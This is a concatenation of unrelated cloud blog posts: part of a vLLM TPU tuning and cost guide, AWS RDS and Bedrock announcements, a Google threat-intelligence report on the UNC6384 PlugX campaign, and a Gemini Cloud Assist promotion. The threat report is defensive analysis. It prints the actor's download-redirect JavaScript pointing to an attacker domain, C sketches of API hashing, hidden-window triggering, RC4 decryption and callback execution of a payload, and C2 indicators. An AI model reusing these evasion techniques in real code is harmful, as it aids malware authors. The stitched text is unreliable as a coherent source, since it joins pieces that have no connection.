We will want to make the following updates to the vllm/benchmarks/auto_tune.sh file:
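The values mirror the earlier run, with the tensor parallel size raised to match the v6e-4 topology; as before, treat the variable names as illustrative and align them with your copy of the script.

# Same workload as before - the main difference is the tensor parallel size.
MODEL="google/gemma-3-27b-it"
TP=4                            # shard the model across all four v6e chips
INPUT_LEN=1500
OUTPUT_LEN=200
MAX_MODEL_LEN=2048
MIN_CACHE_HIT_PCT=50
MAX_LATENCY_ALLOWED_MS=10000
NUM_SEQS_LIST="128 256"
NUM_BATCHED_TOKENS_LIST="512 1024 2048"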
As our auto_tune.sh executes, we determine the largest possible gpu_utilization value our server can run on and then cycle through the different num_batched_tokens parameters to determine which is most efficient.
Troubleshooting Note: It can take a longer amount of time to start up a vLLM engine on TPU due to a series of compilation steps that are required. In some cases, this can go longer than 10 minutes – and when that occurs the auto_tune.sh script may kill the process. If this happens, update the start_server() function such that the for loop sleeps for 30 seconds rather than 10 seconds as shown here:
start_server() {

  ...

  for i in {1..60}; do
    RESPONSE=$(curl -s -X GET "http://0.0.0.0:8004/health" -w "%{http_code}" -o /dev/stdout)
    STATUS_CODE=$(echo "$RESPONSE" | tail -n 1)
    if [[ "$STATUS_CODE" -eq 200 ]]; then
      server_started=1
      break
    else
      sleep 10 # UPDATE TO 30 IF VLLM ENGINE START TAKES TOO LONG
    fi
  done
  if (( ! server_started )); then
    echo "server did not start within 10 minutes. Please check server log at $vllm_log".
    return 1
  else
    return 0
  fi
}
The outputs are printed as our program executes and we can also find them in log files at $BASE/auto-benchmark/TAG. We can see in these logs that our current configurations are still able to achieve our latency requirements.
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 9
This is the final input from the script’s loop. It means your script determined that sending 9 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 10 req/s, the latency was too high.
e2el: 8423.40
This is the P99 latency that was measured when the server was being hit with 9 req/s. Since 8423.40 is less than 10,000, the script accepted this as a successful run.
throughput: 5.63
This is the actual, measured output. Even though you were sending requests at a rate of 9 per second, the server could only successfully process them at a rate of 5.63 per second.
Calculating Performance-Cost Ratio
Now that we have tuned and benchmarked our two primary accelerator candidates, we can bring the data together to make a final, cost-based decision. The goal is to find the most economical configuration that can meet our workload requirement of 100 requests per second while staying under our P99 end-to-end latency limit of 10,000 ms.
We will analyze the cost to meet our 100 req/s target using the best-performing configuration for both the anonymized candidate and the TPU v6e.
Anonymized Accelerator-optimized Candidate
Measured Throughput: The benchmark showed a single vLLM engine achieved a throughput of 4.17 req/s.
Instances Required: To meet our 100 req/s goal, we would need to run multiple instances. The calculation is: 100 req/s ÷ 4.17 req/s per instance ≈ 23.98 instances.
Since we can’t provision a fraction of an instance, we must round up to 24 instances.
Estimated Cost: As of July 2025, the spot price for our anonymized machine type in us-central1 was approximately $2.25 per hour. The total hourly cost for our cluster would be: 24 instances × $2.25/hr = $54.00/hr
Note: We are choosing Spot instance pricing for simple cost figures; this would not be a typical provisioning pattern for this type of workload.
Google Cloud TPU v6e (v6e-4)
Measured Throughput: The benchmark showed a single v6e-4 vLLM engine achieved a higher throughput of 5.63 req/s.
Instances Required: We perform the same calculation for the TPU cluster: 100 req/s ÷ 5.63 req/s per instance ≈ 17.76 instances.
Again, we must round up to 18 instances to strictly meet the 100 req/s requirement.
Estimated Cost: As of July 2025, the spot price for a v6e-4 queued resource in us-central1 is approximately $0.56 per chip per hour. The total hourly cost for this cluster would be:
18 instances × 4 chips x $0.56/hr = $40.32/hr
Conclusion: The Most Cost-Effective Choice
Let’s summarize our findings in a table to make the comparison clear.
Metric                          Anonymized Candidate             TPU (v6e-4)
Throughput per Instance         4.17 req/s                       5.63 req/s
Instances Needed (100 req/s)    24                               18
Spot Instance Cost Per Hour     $2.25 / hour                     $0.56 x 4 chips = $2.24 / hour
Spot Cost Total                 $54.00 / hour                    $40.32 / hour
Total Monthly Cost (730h)       ~$39,400                         ~$29,400
The results are definitive. For this specific workload (serving the gemma-3-27b-it model with long contexts), the v6e-4 configuration is the winner.
Not only does the v6e-4 instance provide higher throughput than our accelerator-optimized instance, but it does so at a reduced cost. This translates to massive savings at higher scales.
Looking at the performance-per-dollar, the advantage is clear:
The v6e-4 configuration delivers roughly a third more performance for every dollar spent (about 2.5 req/s per spot dollar-hour versus about 1.9), making it the superior, efficient choice for deploying this workload.
Final Reminder
This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep the following in mind when sizing these workloads:
If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – the anonymized candidate could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example; had we searched a larger space, we might have found a configuration with even greater cost-savings potential.
Additional Resources
The following is a collection of additional resources to help you complete the guide and better understand the concepts described.
Amazon RDS for MariaDB now supports MariaDB major version 11.8, the latest long-term maintenance release from the MariaDB community. This release supports MariaDB 11.8.3 minor version.
Amazon RDS for MariaDB 11.8 now supports the MariaDB Vector feature, allowing you to store vector embeddings in your database and use retrieval-augmented generation (RAG) when building your Artificial Intelligence (AI) applications. You can use MariaDB Vector to build generative AI capabilities into your e-commerce, media, health applications, and more to find similar items within a catalog. MariaDB 11.8 also introduces the ability to limit the maximum size of temporary files and tables, allowing you to better manage your databases’ storage and prevent potential issues caused by oversized temporary objects. Learn more about these community enhancements in the MariaDB 11.8 release notes and RDS MariaDB release notes.
Amazon RDS for MariaDB makes it straightforward to set up, operate, and scale MariaDB deployments in the cloud. Create or update a fully managed Amazon RDS for MariaDB 11.8 database in the Amazon RDS Management Console.
In March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the PRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG assesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People’s Republic of China (PRC).
The campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN, ultimately leading to the in-memory deployment of the backdoor SOGU.SEC (also known as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing certificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.
Google is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all Gmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified domains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google Security Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this activity in their environments.
Overview
This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat actor’s operational capabilities. We examine how the malware is delivered, how the threat actor utilized social engineering and evasion techniques, and technical aspects of the multi-stage malware payloads.
In this campaign, the malware payloads were disguised as either software or plugin updates and delivered through UNC6384 infrastructure using AitM and social engineering tactics. A high level overview of the attack chain:
The target’s web browser tests if the internet connection is behind a captive portal;
An AitM redirects the browser to a threat actor controlled website;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves an MSI package from the same website;
Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.
Figure 1: Attack chain diagram
Malware Delivery: Captive Portal Hijack
GTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe Plugin update to targeted entities. A captive portal is a network setup that directs users to a specific webpage, usually a login or splash page, before granting internet access. This functionality is intentionally built into all web browsers. The Chrome browser performs an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to enable this redirect mechanism.
While “gstatic.com” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to the threat actor’s landing webpage and subsequent malware delivery, indicating an AitM attack. We assess the AitM was facilitated through compromised edge devices on the target networks. However, GTIG did not observe the attack vector used to compromise the edge devices.
Figure 2: Captive portal redirect chain
Fake Plugin Update
After being redirected, the threat actor attempts to deceive the target into believing that a software update is needed, and to download the malware disguised as a “plugin update”. The threat actor used multiple social engineering techniques to form a cohesive and credible update theme.
The landing webpage resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. The use of HTTPS offers several advantages for social engineering and malware delivery. Browser warning messages, such as “Not Secure” and “Your connection is not private”, will not be displayed to the target, and the connection to the website is encrypted, making it more difficult for network-based defenses to inspect and detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a Certificate Authority.
$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R10
Validity
Not Before: May 17 16:58:11 2025 GMT
Not After : Aug 15 16:58:10 2025 GMT
Subject: CN=mediareleaseupdates[.]com
sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68
Figure 3: Website TLS certificate
The initial landing page is completely blank with a yellow bar across the top and a button that reads “Install Missing Plugins…”. If this technique successfully deceives the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.
Figure 4: Malware landing page
In the background, Javascript code is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target clicks the install button, “myFunction”, which is located in the loaded script, is executed.
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Additional plugins are required to display all the media on this page</title>
<script type="text/javascript" src="https[:]//mediareleaseupdates[.]com/style3.js"> </script>
</head>
<body><div id="adobe update" onclick="myFunction()"...
Figure 5: Javascript from AdobePlugins.html
Inside of “myFunction” another image is loaded to display as the background image on the webpage. The browser window location is also set to the URL of an executable, again hosted on the same domain.
function myFunction()
{
var img = new Image();
img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
document.body.innerHTML = '';
document.body.style.backgroundImage = 'url(' + img.src + ')';
...
window.location.href = "https[:]//mediareleaseupdates[.]com/AdobePlugins.exe";
}
Figure 6: Javascript from style3.js
This triggers the automatic download of “AdobePlugins.exe” and a new background image to be displayed on the webpage. The image shows instructions for how to execute the downloaded binary and bypass potential Windows security protections.
Figure 7: Malware landing page post-download
When the downloaded executable is run, the fake install prompt seen in the above screenshot for “STEP 2” is displayed on screen, along with “Install” and “Cancel” options. However, the SOGU.SEC payload is likely already running on the target device, as neither button triggers any action relevant to the malware.
Malware Analysis
Upon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a novel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC backdoor, which then establishes communication with the threat actor’s command and control (C2) server.
Digitally Signed Downloader: STATICPLUGIN
The downloaded “AdobePlugins.exe” file is a first stage malware downloader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of being able to bypass endpoint security protections that typically trust files with valid digital signatures. This gives the malware false legitimacy, making it harder for both users and automated defenses to detect.
The binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in use. While the signing certificate expired on July 14th, 2025 and is no longer valid, it may be easy for the threat actor to re-sign new versions of STATICPLUGIN with similarly obtained certificates.
Figure 8: Downloader with valid digital signature
STATICPLUGIN implements a custom TForm which is designed to masquerade as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from “https[:]//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. After installation of these files, CANONSTAGER is executed via DLL side-loading.
Certificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd
Our investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin Times Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in use by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.
GTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not attribute these other campaigns to UNC6384, they have multiple similarities and TTP overlaps with this UNC6384 campaign, in addition to using the same code signing certificates.
Delivery through web-based redirects
Downloader first stage, sometimes packaged in an archive
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate applications or updates
Targeting in Southeast Asia
It remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a victim with compromised code signing material. However, they may also be a willing participant or front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber operations.
Malicious Launcher: CANONSTAGER
Once CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window procedures, message queues, and callback functions to execute the final payload.
API Hashing and Thread Local Storage
Thread Local Storage (TLS) is intended to provide each thread in a multi-threaded application its own private data storage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API hashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array.
In short, the API hashing hides which Windows APIs are being used, while the TLS array provides a stealthy location to store the resolved function addresses. Use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.
Below is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryW function address.
Resolve the GetCurrentDirectoryW hash (0x6501CBE1)
Get the location of the TLS array from the Thread Information Block (TIB)
Move the resolved function address into offset 0x8 of the TLS array
Figure 9: Example of storing function addresses in TLS array
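This sequence can be illustrated with a short sketch. It is not CANONSTAGER's recovered code: the hash routine is a hypothetical stand-in for the custom algorithm, forwarded exports are ignored, and a 32-bit (x86) process is assumed so the TLS array pointer can be read from TEB offset 0x2C.

```c
/*
 * Minimal sketch of hash-based API resolution plus TLS-array storage.
 * NOT CANONSTAGER's recovered code: the hash routine is a hypothetical
 * stand-in, forwarded exports are ignored, and a 32-bit (x86) build is
 * assumed so the TLS array pointer can be read from fs:[0x2C].
 */
#include <windows.h>
#include <intrin.h>

/* Hypothetical string hash -- stand-in only, not the real algorithm
   behind the 0x6501CBE1 value cited in the report. */
static DWORD hash_name(const char *name)
{
    DWORD h = 0;
    while (*name)
        h = (h * 33) + (unsigned char)*name++;
    return h;
}

/* Walk a loaded module's export table and return the address of the
   export whose name matches the requested hash. */
static FARPROC resolve_by_hash(HMODULE mod, DWORD wanted)
{
    BYTE *base = (BYTE *)mod;
    IMAGE_DOS_HEADER *dos = (IMAGE_DOS_HEADER *)base;
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + dos->e_lfanew);
    IMAGE_EXPORT_DIRECTORY *exports = (IMAGE_EXPORT_DIRECTORY *)(base +
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    DWORD *names = (DWORD *)(base + exports->AddressOfNames);
    WORD  *ords  = (WORD  *)(base + exports->AddressOfNameOrdinals);
    DWORD *funcs = (DWORD *)(base + exports->AddressOfFunctions);

    for (DWORD i = 0; i < exports->NumberOfNames; i++) {
        if (hash_name((const char *)(base + names[i])) == wanted)
            return (FARPROC)(base + funcs[ords[i]]);
    }
    return NULL;
}

int main(void)
{
    /* 1. Resolve GetCurrentDirectoryW by hash (the report cites the
          constant 0x6501CBE1; the toy hash above produces a different
          value, so it is computed here rather than hardcoded). */
    HMODULE k32 = GetModuleHandleW(L"kernel32.dll");
    FARPROC fn = resolve_by_hash(k32, hash_name("GetCurrentDirectoryW"));

    /* 2. Fetch the TLS array pointer from the TIB/TEB (x86: fs:[0x2C]). */
    void **tls_array = (void **)(ULONG_PTR)__readfsdword(0x2C);

    /* 3. Store the resolved address at offset 0x8 of the TLS array
          (index 2 of an array of 32-bit pointers). */
    if (tls_array && fn)
        tls_array[2] = (void *)fn;

    return 0;
}
```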
Indirect Code Execution
CANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly using the Windows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the malware and raising alerts. It also obscures the malware’s control flow by “hiding” its code inside the window procedure and triggering execution asynchronously. At a high level, CANONSTAGER:
Enters a message loop to receive and dispatch messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives the WM_SHOWWINDOW message; then
Executes SOGU.SEC in-memory with an EnumSystemGeoID callback.
Figure 10: Overview of CANONSTAGER execution using Windows message queue
Window Procedure
On a Windows system, every window class has an associated window procedure. The procedure allows programmers to define a custom function to process messages sent to the specified window class.
CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure for processing messages. Additionally, the window is created with a height and width of zero to remain hidden on the screen.
Inside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and launches the SOGU.SEC payload. Message type 0x0002 (WM_DESTROY) triggers ExitProcess, and any other message type is passed to the default handler (DefWindowProc), effectively ignoring it.
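The following is a minimal sketch of this hidden-window pattern; names such as decrypt_and_launch and HiddenHostClass are placeholders, not symbols recovered from CANONSTAGER.

```c
/*
 * Minimal sketch of the hidden-window pattern described above; names
 * such as decrypt_and_launch and HiddenHostClass are placeholders,
 * not symbols recovered from CANONSTAGER.
 */
#include <windows.h>

static DWORD WINAPI decrypt_and_launch(LPVOID param)
{
    (void)param;          /* placeholder for payload decryption/launch */
    return 0;
}

static LRESULT CALLBACK HiddenWndProc(HWND hwnd, UINT msg, WPARAM wp, LPARAM lp)
{
    switch (msg) {
    case WM_SHOWWINDOW:   /* 0x0018: the trigger message */
        CreateThread(NULL, 0, decrypt_and_launch, NULL, 0, NULL);
        return 0;
    case WM_DESTROY:      /* 0x0002: exit path noted in the report */
        ExitProcess(0);
    default:              /* every other message is ignored */
        return DefWindowProcW(hwnd, msg, wp, lp);
    }
}

HWND create_hidden_window(HINSTANCE inst)
{
    WNDCLASSW wc = {0};
    wc.lpfnWndProc   = HiddenWndProc;
    wc.hInstance     = inst;
    wc.lpszClassName = L"HiddenHostClass";      /* placeholder name */
    RegisterClassW(&wc);

    /* Overlapped window with zero width and height stays invisible. */
    return CreateWindowExW(0, wc.lpszClassName, L"", WS_OVERLAPPED,
                           0, 0, 0, 0, NULL, NULL, inst, NULL);
}
```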
Message Queue
Windows applications use Message Queues for asynchronous communication. Both user applications and the Windows system can post messages to Message Queues. When a message is posted to an application window, the system calls the associated window procedure to process the message.
To trigger the malicious window procedure, CANONSTAGER uses the ShowWindow function to deliver a WM_SHOWWINDOW (0x0018) message to its newly created window via the message queue. Since the system, or other applications, may also post messages to CANONSTAGER’s window, a standard Windows message loop is entered. This ensures all queued messages are dispatched, including the intended WM_SHOWWINDOW message. The loop proceeds as follows:
1. GetMessageW – Retrieve the next message from the thread’s message queue.
2. TranslateMessage – Translate virtual-key messages into character messages.
3. DispatchMessage – Deliver the message to the window procedure (WindowProc) registered for the message’s target window.
4. Loop back to step 1 until all messages are dispatched.
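Continuing the sketch from the previous section, the trigger and the message loop might look roughly like this (still illustrative, not recovered code):

```c
/* Illustrative continuation of the sketch above (not recovered code):
   trigger WM_SHOWWINDOW and pump the queue so the window procedure
   eventually processes it. */
#include <windows.h>

void run_message_pump(HWND hwnd)
{
    MSG msg;

    /* ShowWindow causes a WM_SHOWWINDOW (0x0018) message to be
       delivered to the window's procedure. */
    ShowWindow(hwnd, SW_SHOW);

    /* Standard Windows message loop: retrieve, translate, dispatch. */
    while (GetMessageW(&msg, NULL, 0, 0) > 0) {
        TranslateMessage(&msg);
        DispatchMessageW(&msg);
    }
}
```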
Deploying SOGU.SEC
After the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its SOGU.SEC payload with the following steps (a simplified sketch follows Figure 11):
Read the encrypted “cnmplog.dat” file, packaged in the downloaded MSI;
Decrypt the file with a hardcoded 16-byte RC4 key;
Execute the decrypted payload using an EnumSystemGeoID callback function.
Figure 11: Callback function executing SOGU.SEC
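The decryption and callback execution steps can be illustrated with a short sketch. The RC4 routine below is the textbook algorithm, and the key, buffer handling, and memory-protection call are placeholders rather than details recovered from the malware.

```c
/*
 * Minimal sketch of the decrypt-then-callback-execute pattern; the key,
 * buffer handling, and memory-protection call are illustrative and not
 * details recovered from the malware.
 */
#include <windows.h>

/* Textbook RC4 (KSA + PRGA), decrypting buf in place with a 16-byte key. */
static void rc4(const unsigned char *key, size_t keylen,
                unsigned char *buf, size_t len)
{
    unsigned char S[256];
    unsigned int i, j = 0;

    for (i = 0; i < 256; i++) S[i] = (unsigned char)i;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) & 0xFF;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;
    }
    i = j = 0;
    for (size_t n = 0; n < len; n++) {
        i = (i + 1) & 0xFF;
        j = (j + S[i]) & 0xFF;
        unsigned char t = S[i]; S[i] = S[j]; S[j] = t;
        buf[n] ^= S[(S[i] + S[j]) & 0xFF];
    }
}

/* EnumSystemGeoID calls its GEO_ENUMPROC callback for each geographical
   ID; pointing the callback at a decrypted buffer executes it without a
   more obviously suspicious thread- or process-creation API. */
void decrypt_and_run(unsigned char *payload, size_t payload_len)
{
    static const unsigned char key[16] = { 0 };   /* placeholder key */
    DWORD old;

    rc4(key, sizeof(key), payload, payload_len);

    /* A real loader would have staged the buffer as executable memory. */
    VirtualProtect(payload, payload_len, PAGE_EXECUTE_READWRITE, &old);

    EnumSystemGeoID(GEOCLASS_NATION, 0, (GEO_ENUMPROC)payload);
}
```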
UNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity. Additionally, all of these steps are done in-memory, avoiding endpoint file-based detections.
The Backdoor: SOGU.SEC
SOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. It is a sophisticated, heavily obfuscated backdoor with a wide range of capabilities: it can collect system information, upload files to and download files from a C2 server, and execute a remote command shell. In this campaign, SOGU.SEC was observed communicating directly with the C2 IP address “166.88.2[.]90” over HTTPS.
Attribution
GTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the PRC-nexus threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, TTPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex are both observed to target government sectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed to deliver SOGU.SEC malware from DLL side-loaded malware launchers and have used the same C2 infrastructure.
Conclusion
This campaign is a clear example of the continued evolution of UNC6384’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The combination of advanced techniques such as AitM delivery, valid code signing, and layered social engineering demonstrates this threat actor’s capabilities. This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection.
GTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.
Acknowledgment
A special thanks to Jon Daniels for their contributions.
Appendix: Indicators of Compromise
A Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.
Amazon Bedrock Data Automation (BDA) now supports five additional languages for document workloads beyond English: Portuguese, French, Italian, Spanish, and German. With this launch, customers can process documents in these new languages and create blueprint prompts and instructions in them when using BDA Custom Output for documents. Customers using BDA Standard Output will now receive document summaries and figure captions in the detected language of the document.
BDA is a feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA can be used as a standalone feature or as a parser in Amazon Knowledge Bases RAG workflows.
BDA Documents support for these five new languages is now generally available in the Europe (Frankfurt), Europe (London), Europe (Ireland), Asia Pacific (Mumbai), Asia Pacific (Sydney), US West (Oregon), US East (N. Virginia), and AWS GovCloud (US-West) Regions. To learn more, visit the Bedrock Data Automation product page and the Amazon Bedrock Pricing page.
Amazon Bedrock Data Automation (BDA) is now generally available in the AWS GovCloud (US-West) Region.
BDA is a feature of Amazon Bedrock that enables developers to automate the generation of valuable insights from unstructured multimodal content such as documents, images, video, and audio to build GenAI-based applications. By leveraging BDA, developers can reduce development time and effort, making it easier to build intelligent document processing, media analysis, and other multimodal data-centric automation solutions. BDA can be used as a standalone feature or as a parser in Amazon Knowledge Bases RAG workflows.
With this launch, BDA is now available in a total of 8 AWS Regions: Europe (Frankfurt), Europe (London), Europe (Ireland), Asia Pacific (Mumbai), Asia Pacific (Sydney), US West (Oregon), US East (N. Virginia), and AWS GovCloud (US-West). To learn more, visit the Bedrock Data Automation product page and the Amazon Bedrock Pricing page.
Debugging in a complex, distributed cloud environment can feel like searching for a needle in a haystack. The sheer volume of data, intertwined dependencies, and ephemeral issues make traditional troubleshooting methods time-consuming and often reactive. Just as modern software development demands more context for effective debugging, so too does cloud operations.
Gemini Cloud Assist, a key product in the Google Cloud with Gemini portfolio, simplifies the way you manage your applications with AI-powered assistance to help you design, deploy, and optimize your apps, so you can reach your efficiency, cost, reliability, and security goals.
Then there’s Gemini Cloud Assist investigations, a root-cause analysis (RCA) AI agent for troubleshooting infrastructure and applications that is now available in preview.
When you encounter an issue, you can initiate an investigation from various places like the Logs Explorer, Cloud Monitoring alerts, or directly from the Gemini chat panel. Cloud Assist then analyzes data from multiple sources, including logs, configurations, and metrics, to produce ranked and filtered “Observations” that provide insights into your environment’s state. It synthesizes these observations to diagnose probable root causes, explains the context, and recommends the next steps or fixes to resolve the problem. If you need more help, your investigation, along with all its context, can be seamlessly transferred into a Google Cloud support case to expedite resolution with a support engineer.
How Gemini Cloud Assist investigations works
Gemini Cloud Assist investigations helps to find the root cause of an issue using a combination of capabilities:
Programmatic, proactive, and interactive access: Trigger or consume your investigation through API calls, chat menu, or UI for proactive or interactive troubleshooting.
Contextualization: Investigations discover the most relevant resources, data sources, and APIs in your environment to provide focused troubleshooting.
Comprehensive signal analysis: Investigations perform deep analysis in parallel across Cloud Logs, Cloud Asset Inventory, App Hub, Metrics, Errors, and Log Themes to uncover anomalies, configuration changes, performance bottlenecks, and recurring issues.
AI-powered insights and recommendations: Utilizing specialized knowledge sources, such as Google Cloud support knowledge bases and internal runbooks, investigations generate probable root causes and actionable recommendations.
Interactive collaboration: Chat with and share investigations for collaborative troubleshooting between you, your team, and Gemini Cloud Assist.
Handoff to Google Cloud Support: Convert your investigation directly to a support case without losing any time or context.
Programmatic, proactive, and interactive investigations
Early users are thrilled with the speed and effectiveness with which Cloud Assist investigations helps them troubleshoot and resolve tough problems.
“At ZoomInfo, maintaining uptime is critical, but equally important is ensuring our engineers can swiftly and effectively troubleshoot complex issues. By integrating Gemini Cloud Assist investigations early into our development process, we’ve accelerated troubleshooting across all levels of our engineering team. Engineers at every experience level can now rapidly diagnose and resolve problems, reducing some resolution times from hours to minutes. This efficiency enables our teams to spend more energy innovating and less time on reactive problem-solving. Gemini Cloud Assist investigations isn’t just a troubleshooting aid; it’s a key driver of productivity and innovation.” – Yasin Senturk, DevOps Engineer at ZoomInfo
“I’m really impressed by how Gemini Cloud Assist Investigations feature in 2 minutes turned over with some valid suggestions on the potential root causes, and the first one being the actual culprit! I was able to mitigate the whole issue within an hour. Gemini Cloud Assist really saved my weekend!” – Chuanzhen Wu, SRE, Google Waze
Let’s walk through Gemini Cloud Assist investigations’ capabilities in a bit more detail.
Programmatic, proactive, and interactive access
You can start an investigation directly from various points within Google Cloud, such as error messages in Logs Explorer or specific product pages (like Google Kubernetes Engine or Cloud Run), or from the central Investigations page, where you can provide context like error messages, affected resources, and observation time. Gemini Cloud Assist investigations also provides an API, allowing you to integrate it into existing workflows such as Slack or other incident management tools. If the root cause of an issue requires further assistance, you can trigger a Google Cloud support case with the Investigation response so support engineers can proceed from that point.
Contextualization
Investigations can start with a natural language description, error message, log snippets, or any combination of information that you have about your issue. It starts by gathering the initial context related to your issue, then builds a topology of relevant resources and all the associated data sources that might provide insights to the root cause.
Investigations uses both public and private knowledge, playbooks informed by Google SRE and Google Cloud Support issues, and your topology, grounding itself in similar issues before generating a troubleshooting plan for your issue. This context becomes key in providing focused and comprehensive signal analysis.
Comprehensive signal analysis
Once the investigation runs, you’ll see the observations that it starts to collect from your project. The investigation goes beyond surface-level observations; it automatically analyzes critical data sources across your Google Cloud environment, including:
Google Cloud logs: Sifting through vast log data to identify anomalies and critical events
Cloud Asset Inventory: Understanding changes in your resource configurations and their potential impact
Metrics (coming soon): Correlating performance data to pinpoint resource exhaustion or unexpected behavior
Errors: Aggregating and categorizing errors to highlight patterns and recurring problems
Log themes: Identifying common patterns and themes within log data to provide a higher-level view of issues
AI-powered insights and recommendations
Observations are the basis of Gemini Cloud Assist investigations’ root-cause insights and recommendations. Leveraging Gemini’s analytical capabilities, Cloud Assist synthesizes observations from disparate data sources, ranking and filtering information to focus on the most relevant details. Crucially, investigations draw upon differentiated knowledge sources and publicly available documentation, such as extensive Google Cloud support troubleshooting knowledge and internal runbooks, to generate highly accurate and relevant insights and observations. It then generates:
Probable root cause: Provides clear hypotheses about the underlying cause of the issue, complete with contextual explanations
Actionable recommendations: Offers concrete next steps for troubleshooting or even direct fixes, helping you resolve incidents faster
Handoff to Google Support teams
If an issue proves particularly elusive, with the click of a button, investigations packages context, observations, and hypotheses into a support case, for faster issue resolution. This is why you might want to run an investigation before contacting Google support teams about an issue.
Get started with Gemini Cloud Assist investigations today
